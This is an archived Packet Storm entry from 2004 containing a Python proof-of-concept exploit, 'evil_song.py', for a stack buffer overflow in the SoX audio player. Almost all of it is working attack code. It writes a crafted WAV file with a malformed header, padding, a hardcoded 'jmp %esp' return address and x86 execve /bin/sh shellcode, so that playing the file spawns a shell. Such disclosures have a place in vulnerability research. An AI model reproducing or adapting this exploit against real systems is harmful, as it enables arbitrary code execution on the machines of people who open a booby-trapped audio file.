evil_song.py

2004-08-05T00:00:00
ID PACKETSTORM:33934
Type packetstorm
Reporter Serkan Akpolat
Modified 2004-08-05T00:00:00

Description

                                        
                                            `# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar  
# Tested Under Slackware 9.1  
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org  
# Homepage: http://deicide.siyahsapka.org  
# Greets to: Virulent   
# deicide@gate:~$ play britney.wav   
# sh-2.05b$   
  
# "jmp %esp" from libc.so , change this if needed..  
retJmpEsp=0x4029824B  
  
# intel_order() from MOSDEF  
def intel_order(myint):  
str=""  
a=chr(myint % 256)  
myint=myint >> 8  
b=chr(myint % 256)  
myint=myint >> 8  
c=chr(myint % 256)  
myint=myint >> 8  
d=chr(myint % 256)  
str+="%c%c%c%c" % (a,b,c,d)  
return str  
  
# Wave Header  
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\  
"\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\  
"\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\  
"\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\  
"\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\  
"\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\  
"\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\  
"\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"  
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"  
  
evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode  
wavFile = open("britney.wav", "wb")  
wavFile.write(evilBuf)  
wavFile.close()  
print "Evil Song has been created :Pp"  
  
`